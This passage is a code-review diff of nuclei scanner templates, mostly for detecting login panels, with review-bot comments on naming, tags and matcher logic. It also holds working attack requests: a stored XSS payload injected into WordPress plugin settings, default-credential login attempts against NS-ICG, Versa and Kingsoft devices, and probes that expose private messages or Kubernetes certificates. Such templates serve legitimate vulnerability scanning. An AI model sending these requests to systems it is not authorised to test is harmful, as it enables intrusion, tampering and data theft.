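Review bot: The `name` abbreviates the plugin to `CDI` and the description refers only to `The plugin`, so nothing in the template states what software it targets; the wordpress.org reference slug identifies it as collect-and-deliver-interface-for-woocommerce. Spell it out, e.g. `name: Collect and Deliver Interface for WooCommerce (CDI) < 5.1.9 - Cross-Site Scripting`, and hyphenate `Cross-Site` to match the repo's other XSS names.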


@ -0,0 +1,48 @@
id: CVE-2022-2034
info:
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
author: imhunterand
severity: medium
description: |
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
reference:
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-862
metadata:
verified: "true"
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
payloads:
num: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_message'
- 'guid":{"rendered":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200


@ -2,7 +2,7 @@ id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
author: For3stCo1d,spac3wh1te
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
reference:


@ -1,7 +1,7 @@
id: CVE-2022-25323
info:
name: ZEROF Web Server 2.0 Cross-Site Scripting
name: ZEROF Web Server 2.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.


@ -0,0 +1,41 @@
id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: high
description: |
ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25481
cwe-id: CWE-668
metadata:
shodan-query: title:"ThinkPHP"
verified: "true"
tags: cve,cve2022,thinkphp,exposure,oss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
words:
- "ThinkPHP"
- type: word
words:
- "HttpException"
- "TRACE"
condition: or
- type: status
status:
- 404
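Review bot: The matchers accept any 404 response containing `ThinkPHP` plus either `HttpException` or `TRACE`, which describes a generic ThinkPHP debug/trace error page rather than evidence that environment parameters are exposed as the description claims; any debug-enabled install is likely to match. If the trace page reliably prints the environment table, add a stable heading from that table to the first word matcher; otherwise reword the description to say the template identifies debug mode, not the leaked values themselves.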


@ -15,9 +15,9 @@ info:
cve-id: CVE-2022-3484
cwe-id: CWE-79
metadata:
verified: true
google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
verified: "true"
tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress
tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core
requests:
- method: GET


@ -0,0 +1,64 @@
id: CVE-2022-3506
info:
name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability.
reference:
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828
- https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3506
cwe-id: CWE-79
metadata:
verified: "true"
tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D
- |
GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(all_headers_4, 'text/html')"
- "status_code_4 == 200"
- 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")'
- "contains(body_4, 'The amount of automatically')"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
internal: true
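Review bot: The third request writes the plugin's settings through `/wp-admin/options.php`, permanently storing the payload in `rp4wp[heading_text]` and overwriting the `css`, `excerpt_length` and `automatic_linking` options on the target, and nothing restores them afterwards; yet the `tags` line omits `intrusive`, which CVE-2021-43421 in this commit uses for a template with a comparable persistent side effect. Add `intrusive` to the tags and, ideally, a final request that resets `rp4wp[heading_text]` to a harmless value once the matcher has seen the reflection. The `reference` list also lists the same huntr URL twice, with and without a trailing slash; keep one.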


@ -0,0 +1,39 @@
id: CVE-2022-45933
info:
name: KubeView - Information disclosure
author: For3stCo1d
severity: critical
description: |
KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
reference:
- https://github.com/benc-uk/kubeview/issues/95
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-45933
cwe-id: CWE-287
metadata:
shodan-query: http.title:"KubeView"
verified: "true"
tags: cve,cve2022,kubeview,kubernetes,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/scrape/kube-system"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BEGIN CERTIFICATE'
- 'END CERTIFICATE'
- 'kubernetes.io'
condition: and
- type: status
status:
- 200
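Review bot: `verified: "true"` under `metadata` is a quoted string, while the other templates added in this commit (nsicg-default-login, versa-flexvnf-default-login) write the bare boolean `verified: true`; a consumer that compares the field to a boolean would treat the two forms differently, so use `verified: true` here. The CVE-2022-3506 section above carries the same quoted form. The body words anded with `status: 200` are a sound signal, but a positive match means the response contained certificate material from kube-system, so any stored responses from a run of this template should be handled as sensitive output.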


@ -0,0 +1,48 @@
id: nsicg-default-login
info:
name: Ns-icg Default Login
author: pikpikcu
severity: high
description: |
There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole.
reference: |
- https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
metadata:
verified: true
fofa-query: "NS-ICG"
tags: nsicg,default-login
requests:
- raw:
- |
@timeout: 25s
POST /user/login/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
- |
@timeout: 25s
GET /user/main HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/user/login/
attack: pitchfork
payloads:
username:
- ns25000
password:
- ns25000
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "/user/main/")'
- 'status_code_1 == 302'
- 'status_code_2 == 200'
- contains(body_2, "var loguser = \'ns25000")
condition: and
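Review bot: `reference: |` makes the reference a single block-scalar string whose text begins with the literal `- `, instead of the list every other template on this page uses; drop the `|` so it parses as a sequence: `reference:` followed by `  - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603`. The last DSL entry, `contains(body_2, "var loguser = \'ns25000")`, is an unquoted YAML scalar, so the DSL receives a literal backslash before the quote; if the expression engine does not unescape `\'`, the search string never matches. Writing it as `- 'contains(body_2, "var loguser = ''ns25000")'` removes the backslash and matches the quoting style of the three entries above it.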


@ -3,7 +3,7 @@ id: kingsoft-v8-default-login
info:
name: Kingsoft V8 Default Login
author: ritikchaddha
severity: medium
severity: high
reference:
- https://idc.wanyunshuju.com/aqld/2123.html
tags: kingsoft,default-login
@ -14,7 +14,7 @@ requests:
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: {{Hostname}}
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}}
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}}
attack: pitchfork
payloads:
@ -22,6 +22,7 @@ requests:
- admin
password:
- admin
host-redirects: true
max-redirects: 2
matchers-condition: and


@ -0,0 +1,57 @@
id: versa-flexvnf-default-login
info:
name: Versa FlexVNF Web-UI - Default Login
author: c-sh0
severity: high
reference:
- https://versa-networks.com/products/
metadata:
verified: true
shodan-query: title:"Flex VNF Web-UI"
tags: default-login,versa,flexvnf
requests:
- raw:
- |
GET /authenticate HTTP/1.1
Host: {{Hostname}}
- |
POST /authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
CSRF-Token: {{xsrf_token}}
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- versa
- admin
password:
- versa123
- versa123
cookie-reuse: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"username\":\"{{username}}\",\"error\":false}"
- type: status
status:
- 200
extractors:
- type: regex
name: xsrf_token
group: 1
internal: true
part: header
regex:
- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'
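Review bot: The info block has no `description`, unlike the other default-login template added in this commit (nsicg-default-login) and the panel templates the commit is enhancing; add `description: Versa FlexVNF Web-UI default login credentials were discovered.` after `severity: high`. The only reference is a product page, so a reader cannot verify where the `versa`/`versa123` and `admin`/`versa123` pairs come from; a vendor document or advisory link would ground them. The second request sends `CSRF-Token: {{xsrf_token}}` taken from the header extractor on the first response, and if that Set-Cookie header is absent the placeholder presumably goes out unresolved; a short comment above the extractor stating that dependency would help the next editor.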


@ -1,9 +1,14 @@
id: apache-jmeter-dashboard
info:
name: Apache JMeter Dashboard
name: Apache JMeter Dashboard Login Panel - Detect
author: tess
severity: low
description: Apache JMeter Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Apache JMeter Dashboard"
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28
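Review bot: The added `classification` block pairs `cwe-id: CWE-200` (information exposure) with a vector that declares no confidentiality impact (`C:N`) and a score of 0.0, which sits oddly for an info-severity panel detection; the same block is appended verbatim in every other section below that ends with a `# Enhanced by md` trailer (public-tomcat-manager, dplus-dashboard, fastpanel-hosting-control-panel and the ibm-* through jira-detect sections). If the CWE is kept for downstream tooling, a one-line comment such as `# classification is boilerplate for panel detections; CVSS 0.0 is intentional` above the block would stop the pairing from reading as a mistake; otherwise drop `cwe-id`. The `# Enhanced by md on 2022/11/28` trailer records provenance that git history already carries and will go stale as the file is edited; harmless, but a point of style.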


@ -1,11 +1,13 @@
id: public-tomcat-manager
info:
name: Apache Tomcat Manager Disclosure
name: Apache Tomcat Manager Login Panel - Detect
author: Ahmed Sherif,geeknik,sinKettu
severity: info
description: An Apache Tomcat Manager panel was discovered.
description: Apache Tomcat Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: title:"Apache Tomcat"
@ -20,6 +22,7 @@ requests:
matchers-condition: and
matchers:
- type: word
part: response
words:
- "Apache Tomcat"
- "Tomcat Manager"
@ -30,3 +33,5 @@ requests:
- 401
- 200
condition: or
# Enhanced by md on 2022/11/28
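Review bot: The word matcher now carries `part: response`, which is not among the parts the HTTP matcher documentation lists (`body`, `header`, `all`); if nuclei does not resolve `response` to a response field the matcher silently never matches, and with `matchers-condition: and` the template would stop firing. If the intent is to search headers and body together, `part: all` is the documented spelling. The request that holds this matcher starts outside the hunk.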


@ -0,0 +1,27 @@
id: asus-router-panel
info:
name: Asus Router Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: 'Server: httpd/2.0 port:8080'
tags: panel,asus,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/Main_Login.asp"
matchers-condition: and
matchers:
- type: word
words:
- '<title>ASUS Login</title>'
- 'Sign in with your ASUS router account'
condition: or
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: backpack-admin-panel
info:
name: Backpack Admin Login Panel
author: shine
severity: info
description: |
An Backpack Admin dashboard was detected.
metadata:
verified: true
shodan-query: title:"Backpack Admin"
tags: panel,backpack,admin
requests:
- method: GET
path:
- "{{BaseURL}}/admin/login"
matchers:
- type: word
part: body
words:
- 'Backpack Admin'
- 'backpack_alerts'
condition: or
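Review bot: The description reads `An Backpack Admin dashboard was detected.`; the article is wrong, so write `A Backpack Admin dashboard was detected.` or the `... login panel was detected.` phrasing this commit applies elsewhere. The template also has no status matcher: the other new panel templates on this page pair the word matcher with a `status: 200` matcher under `matchers-condition: and`, and the same here would keep an error page that echoes `Backpack Admin` from matching.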


@ -0,0 +1,40 @@
id: cisco-webvpn-detect
info:
name: Cisco WebVPN Detect
author: ricardomaia
severity: info
reference:
- https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/
metadata:
verified: true
fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg=="
google-query: intitle:"SSLVPN Service"
tags: panel,cisco,vpn
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/webvpn.html"
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CISCO"
- "AnyConnect"
- "SSLVPN Service"
condition: or
case-insensitive: true
- type: regex
part: header
regex:
- "webvpncontext=00@.+"
- "webvpn="
condition: or
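Review bot: The info block lacks a `description` while the other panel templates in this commit get one; add `description: Cisco WebVPN (clientless SSL VPN) login panel was detected.` after `severity: info`. The body words are broad (`CISCO` with `case-insensitive: true` matches any page mentioning the vendor), so the template's precision rests on the header regex entries `webvpncontext=00@.+` and `webvpn=`; a comment above that matcher, e.g. `# the webvpn cookie is the discriminating signal; body words alone are generic`, would keep a later edit from loosening `matchers-condition` to `or`.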


@ -0,0 +1,27 @@
id: cudatel-panel
info:
name: CudaTel Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: title:"CudaTel"
tags: panel,cudatel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- 'CudaTel Communications Server'
- 'alt="CudaTel'
condition: or
- type: status
status:
- 200


@ -1,9 +1,14 @@
id: dplus-dashboard
info:
name: DPLUS Dashboard Exposure
name: DPLUS Dashboard Panel - Detect
author: tess
severity: info
description: DPLUS Dashboard panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"DPLUS Dashboard"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28


@ -0,0 +1,25 @@
id: dqs-superadmin-panel
info:
name: DQS Superadmin Login Panel
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"DQS Superadmin"
tags: panel,dqs,superadmin
requests:
- method: GET
path:
- '{{BaseURL}}/#/login'
matchers-condition: and
matchers:
- type: word
words:
- "DQS | Superadmin"
- type: status
status:
- 200
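Review bot: The path `{{BaseURL}}/#/login` contains a URL fragment; fragments are not sent to the server, so the request that actually goes out is for `{{BaseURL}}/` and the `/#/login` part only documents a client-side route. Write the path as `- "{{BaseURL}}/"` and, if the route is worth recording, keep it as a comment: `# login view is the SPA route /#/login; only / is requested`. flahscookie-superadmin-panel below uses a real server path (`/pages/login`) and is unaffected.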


@ -0,0 +1,28 @@
id: dradis-pro-panel
info:
name: Dradis Professional Edition Panel
author: righettod
severity: info
reference:
- https://dradisframework.com/ce/
metadata:
verified: true
shodan-query: title:"Dradis Professional Edition"
tags: panel,dradis
requests:
- method: GET
path:
- "{{BaseURL}}/pro/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Dradis Professional Edition"
- type: status
status:
- 200
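Review bot: The only `reference` points at the Community Edition page (`https://dradisframework.com/ce/`), while the template's name, matcher word and `/pro/login` path all target Professional Edition, so a reader following the link lands on a different product. Point it at a Professional Edition page or one that documents the `/pro/login` route, or add a comment explaining why the CE link was chosen.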


@ -0,0 +1,42 @@
id: exolis-engage-panel
info:
name: Exolis Engage Panel - Detect
author: righettod
description: Exolis Engage panel was detected.
severity: info
reference:
- https://www.exolis.fr/en/solution-2/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"engage - Portail soignant"
google-dork: intitle:"engage - Portail soignant"
tags: panel,exolis,engage
requests:
- method: GET
path:
- "{{BaseURL}}/app.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "engage-specific-config"
- "engage-lastAppUserType"
- "engage-lastHelperPatientContext"
- "engage-preferred-language"
- "engageManager.admin"
- "engageManager.user"
condition: or
- type: status
status:
- 200
# Enhanced by md on 2022/11/29
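Review bot: The metadata key is `google-dork`, whereas the other templates in this commit spell it `google-query` (cisco-webvpn-detect, intelbras-login); tooling that indexes metadata by key would presumably miss this entry, so rename it to `google-query: intitle:"engage - Portail soignant"`. The `# Enhanced by md on 2022/11/29` trailer on a brand-new file is also out of place, since there is no earlier version that was enhanced.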


@ -1,9 +1,14 @@
id: fastpanel-hosting-control-panel
info:
name: Fastpanel Hosting Control Panel
name: FASTPANEL Login Panel - Detect
author: pikpikcu
severity: info
description: FASTPANEL login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"FASTPANEL HOSTING CONTROL"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28


@ -0,0 +1,25 @@
id: flahscookie-superadmin-panel
info:
name: Flahscookie Superadmin Login
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"Flahscookie Superadmin"
tags: panel,flahscookie,superadmin
requests:
- method: GET
path:
- '{{BaseURL}}/pages/login'
matchers-condition: and
matchers:
- type: word
words:
- "Flahscookie Superadmin"
- type: status
status:
- 200


@ -1,12 +1,16 @@
id: ibm-security-access-manager
info:
name: Detects IBM Security Access Manager
name: IBM Security Access Manager Login Panel - Detect
author: geeknik
severity: info
description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
description: IBM Security Access Manager login panel was detected.
reference:
- https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,ibm
requests:
@ -32,3 +36,5 @@ requests:
- "/mga/sps/authsvc/policy/forgot_password"
part: body
condition: and
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: ibm-service-assistant
info:
name: IBM Service Assistant
name: IBM Service Assistant Login Panel - Detect
author: dhiyaneshDK
severity: info
description: IBM Service Assistant login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Welcome to Service Assistant"
tags: panel,ibm,service
@ -22,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: ibm-websphere-admin-panel
info:
name: WebSphere Application Server Community Edition Admin Panel
name: IBM WebSphere Application Server Community Edition Admin Login Panel - Detect
author: ritikchaddha
severity: info
description: IBM WebSphere Application Server Community Edition admin login panel was detected.
reference:
- https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:1337147129
@ -30,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: ibm-websphere-panel
info:
name: IBM WebSphere Panel
name: IBM WebSphere Portal Login Panel - Detect
author: pdteam
severity: info
description: IBM WebSphere Portal login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.html:"IBM WebSphere Portal"
tags: ibm,websphere,panel
@ -26,4 +31,6 @@ requests:
words:
- 'IBM WebSphere Portal'
- 'IBMPortalWeb'
condition: or
condition: or
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: icc-pro-login
info:
name: ICC Pro System Login
name: ICC PRO Login Panel - Detect
author: DhiyaneshDk
severity: info
description: ICC PRO login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/7980
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login to ICC PRO system"
@ -31,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: icewarp-panel-detect
info:
name: IceWarp Panel Detect
name: IceWarp Login Panel - Detect
author: ritikchaddha
severity: info
description: IceWarp login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"icewarp"
@ -32,3 +37,5 @@ requests:
group: 1
regex:
- 'Server: (.{4,20})'
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: icinga-web-login
info:
name: Icinga Web 2 Login
name: Icinga Web 2 Login Panel - Detect
author: dhiyaneshDK
severity: info
description: Icinga Web 2 login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Icinga Web 2 Login"
tags: panel,icinga
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: identity-services-engine
info:
name: Identity Services Engine
name: Cisco Identity Services Engine Admin Login Panel - Detect
author: dhiyaneshDK
severity: info
description: Cisco Identity Services Engine admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Identity Services Engine"
tags: panel
@ -19,3 +24,5 @@ requests:
- type: word
words:
- '<title>Identity Services Engine</title>'
# Enhanced by md on 2022/11/21
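Review bot: The name now identifies the product as Cisco Identity Services Engine, but `tags: panel` was left as the only tag, so selecting templates by vendor or product tag would not pick this one up; change it to `tags: panel,cisco,ise`. iomega-emc-shared-nas below has the same gap (`tags: panel` alone after the rename to Iomega LenovoEMC NAS).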


@ -1,9 +1,14 @@
id: ilch-admin-panel
info:
name: Ilch CMS Admin Panel
name: Ilch CMS Admin Login Panel - Detect
author: ritikchaddha
severity: info
description: Ilch CMS admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Ilch"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: incapptic-connect-panel
info:
name: IVANTI Incapptic Connect
name: Ivanti Incapptic Connect Panel - Detect
author: righettod
severity: info
description: Ivanti Incapptic Connect panel was detected.
reference:
- https://www.ivanti.com/products/incapptic-connect
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query:
- http.title:"incapptic"
@ -34,3 +39,5 @@ requests:
- "status_code==200"
- "('-1067582922' == mmh3(base64_py(body)))"
condition: and
# Enhanced by md on 2022/11/21


@ -1,4 +1,4 @@
id: influxdb-detect
id: influxdb-panel
info:
name: InfluxDB Detect
@ -9,7 +9,7 @@ info:
- https://www.influxdata.com/
metadata:
shodan-query: http.title:"InfluxDB - Admin Interface"
tags: tech,influxdb
tags: panel,influxdb
requests:
- method: GET


@ -1,11 +1,16 @@
id: intelbras-login
info:
name: Intelbras Login
name: Intelbras Router Login Panel - Detect
author: DhiyaneshDK
severity: info
description: Intelbras router logjn panel was detected.
reference:
- https://www.exploit-db.com/ghdb/7272
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Intelbras"
google-query: intitle:"Intelbras" "All Rights Reserved" -.com
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: intelbras-panel
info:
name: Intelbras Panel
name: Intelbras Router Panel - Detect
author: pikpikcu
severity: info
description: Intelbras router panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Intelbras"
@ -29,3 +34,5 @@ requests:
group: 1
regex:
- 'id="product">([A-Za-z 0-9]+)<\/p>'
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: intellian-aptus-panel
info:
name: Intellian Aptus Web Login Panel
name: Intellian Aptus Web Login Panel - Detect
author: princechaddha
severity: info
description: Intelllian Aptus Web login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Intellian Aptus Web"
tags: panel,intellian,aptus
@ -31,3 +36,5 @@ requests:
group: 1
regex:
- "<title>Intellian Aptus Web (.*)</title>"
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: intelliflash-login-panel
info:
name: IntelliFlash Login Panel Detect
name: IntelliFlash Login Panel - Detect
author: princechaddha
severity: info
description: IntelliFlash login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,intelliflash
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: iomega-emc-shared-nas
info:
name: Iomega Lenovo EMC with shared NAS
name: Iomega LenovoEMC NAS Login Panel - Detect
author: e_schultze_
severity: info
description: Iomega LenovoEMC NAS login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel
requests:
@ -28,3 +33,5 @@ requests:
